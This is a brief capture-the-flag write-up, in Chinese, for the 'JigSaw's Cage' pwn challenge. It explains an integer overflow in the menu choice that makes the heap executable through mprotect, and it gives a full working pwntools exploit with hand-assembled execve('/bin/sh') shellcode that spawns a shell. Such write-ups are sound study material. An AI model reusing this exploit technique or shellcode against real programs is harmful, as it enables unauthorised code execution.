JigSaw’sCage
开始菜单 make choice 的输入处有一个整型溢出，可将 v4 改得比 0xe 大，从而进入 else 分支，由 mprotect 给 heap 段加上 rwx 权限。
test 运行 shellcode 时 rdx 是堆地址，利用这一点将 /bin/sh 的地址传到 rdi，然后 syscall getshell。
EXP
from pwn import *

# Echo every send/recv on the tube; useful when stepping through the menu by hand.
context.update(log_level='debug')
# Binding the ELF to the context is what gives asm() below the target's arch/bits.
e = ELF("./JigSAW")
context.update(binary=e)
p = process(['./JigSAW'])
def add(idx):
    """Drive menu option 1 for slot *idx* on the global tube ``p``."""
    for prompt, answer in (('Choice : ', '1'), ('Index? : ', str(idx))):
        p.sendlineafter(prompt, answer)
def edit(idx, content):
    """Drive menu option 2: select slot *idx*, then send *content*.

    The content is sent with ``sendafter`` (no trailing newline) so the bytes
    written are exactly what the caller supplied.
    """
    send_line, send_raw = p.sendlineafter, p.sendafter
    send_line('Choice : ', '2')
    send_line('Index? : ', str(idx))
    send_raw('iNput:', content)
def delete(idx):
    """Drive menu option 3 for slot *idx* on the global tube ``p``."""
    steps = [('Choice : ', '3'), ('Index? : ', str(idx))]
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)
def test(idx):
    """Drive menu option 4 for slot *idx* (the option the writeup says executes the slot)."""
    slot = str(idx)
    p.sendlineafter('Choice : ', '4')
    p.sendlineafter('Index? : ', slot)
# Exploit sequence for the writeup above.  This is a Python 2 script (raw_input,
# str payloads); everything here runs at import time, in order, against the
# live process `p` started in the setup block.
p.sendafter('Name:\n', 'PWN')
# 0xE<<32 == 0xE00000000.  Per the writeup, the menu-choice input has an
# integer-overflow bug: this value makes the checked variable exceed 0xe and
# reach the else branch that mprotect()s the heap RWX.  The fix on the
# program side is to validate the choice as a bounded integer in a single
# width and never to map the heap executable (W^X); either change breaks
# the steps that follow.
p.sendlineafter('Choice:', str(0xE<<32))
p.sendlineafter('Choice:', str(0))
add(0)
add(1)
edit(1, '/bin/sh\x00')
# Shellcode stored in slot 0; the writeup states rdx holds a heap address when
# test() runs it, and the RWX heap from the step above is the precondition.
payload = asm('add dl,0x20;push rsi;pop rdi;xchg rdi,rdx;push rsi;pop rax;mov al,59;syscall;')
edit(0, payload)
# Debug aid only: attaches gdb with a breakpoint at the given image offset and
# blocks until Enter is pressed.  Drop both lines for a non-interactive run.
gdb.attach(p, "b *$rebase(0x1D32)")
raw_input()
sleep(0.2)  # presumably lets the debugger/tube settle before the trigger -- TODO confirm
test(0)
p.interactive()
# NOTE: dead guard -- the whole script already executed above, so this
# branch only ever runs `pass`.
if __name__ == '__main__':
    pass